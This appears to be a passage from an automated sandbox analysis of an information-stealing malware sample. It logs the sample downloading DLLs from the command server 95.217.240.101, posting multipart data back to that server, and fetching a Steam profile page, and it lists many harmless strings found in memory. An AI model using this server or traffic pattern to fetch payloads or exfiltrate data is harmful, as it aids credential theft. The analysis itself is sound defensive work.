Source: global traffic | HTTP traffic detected: GET /mozglue.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1 | Host: 95.217.240.101 | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /msvcp140.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1 | Host: 95.217.240.101 | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /nss3.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1 | Host: 95.217.240.101 | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /softokn3.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1 | Host: 95.217.240.101 | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1 | Host: 95.217.240.101 | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----JKFIDGDHJEGIEBFHDGDG | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1 | Host: 95.217.240.101 | Content-Length: 1145 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----FCFBFHIEBKJKFHIEBFBA | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1 | Host: 95.217.240.101 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----CGIDAAAKJJDBGCBFCBGI | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1 | Host: 95.217.240.101 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----GCGHJEBGHJKEBFHIJDHC | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1 | Host: 95.217.240.101 | Content-Length: 453 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----AECAKECAEGDHIECBGHII | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1 | Host: 95.217.240.101 | Content-Length: 116501 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----JJDGCGHCGHCBFHJJKKJE | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1 | Host: 95.217.240.101 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----DAAAFBKECAKEHIEBAFIE | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1 | Host: 95.217.240.101 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_0040514C _EH_prolog,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,lstrlenA,lstrlenA,GetProcessHeap,HeapAlloc,lstrlenA,memcpy,lstrlenA,lstrlenA,memcpy,lstrlenA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,
                  Source: global traffic | HTTP traffic detected: GET /profiles/76561199686524322 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Connection: Keep-AliveCache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: GET /sqlx.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Connection: Keep-AliveCache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
                  Source: unknown | HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGHJEBGHJKEBFHIJDHCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr | String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr | String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr | String found in binary or memory: http://ocsp.digicert.com0
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr | String found in binary or memory: http://ocsp.digicert.com0A
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr | String found in binary or memory: http://ocsp.digicert.com0C
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr | String found in binary or memory: http://ocsp.digicert.com0N
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr | String found in binary or memory: http://ocsp.digicert.com0X
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | String found in binary or memory: http://store.steampowered.com/privacy_agreement/
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr | String found in binary or memory: http://www.digicert.com/CPS0
                  Source: RegAsm.exe, RegAsm.exe, 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr | String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                  Source: RegAsm.exe, 00000003.00000002.2044042072.000000001928D000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.3.dr | String found in binary or memory: http://www.sqlite.org/copyright.html.
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | String found in binary or memory: http://www.valvesoftware.com/legal.htm
                  Source: 76561199686524322[1].htm.3.dr | String found in binary or memory: https://95.217.240.101
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://95.217.240.101/
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://95.217.240.101/freebl3.dll
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://95.217.240.101/freebl3.dlls
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://95.217.240.101/mozglue.dll
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://95.217.240.101/msvcp140.dll
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://95.217.240.101/msvcp140.dllU
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://95.217.240.101/nss3.dll
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://95.217.240.101/nss3.dll2
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://95.217.240.101/softokn3.dll
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://95.217.240.101/softokn3.dllK
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://95.217.240.101/sqlx.dll
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://95.217.240.101/v
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://95.217.240.101/vcruntime140.dll
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://95.217.240.101FIE
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://95.217.240.101KJE
                  Source: JEGHDA.3.dr | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: 76561199686524322[1].htm.3.dr | String found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000001068000.00000004.00000020.00020000.00000000.sdmp, IIDHJD.3.dr | String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000001068000.00000004.00000020.00020000.00000000.sdmp, IIDHJD.3.dr | String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                  Source: JEGHDA.3.dr | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: JEGHDA.3.dr | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: JEGHDA.3.dr | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=5CgcHEsWGA
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&l=english&am
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&l=engli
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh&
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&l=en
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=yF_q
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=PyuRtGtUpR0t&l=englis
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=Wd0kCESeJquW&l=
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=engli
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=X93cgZRtuH6z&l=engli
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=dERfFkkJ-bKK&amp
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&l=engl
                  Source: 76561199686524322[1].htm.3.dr | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l=
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=2VoZa2M8Wh3k&
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.dr | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&
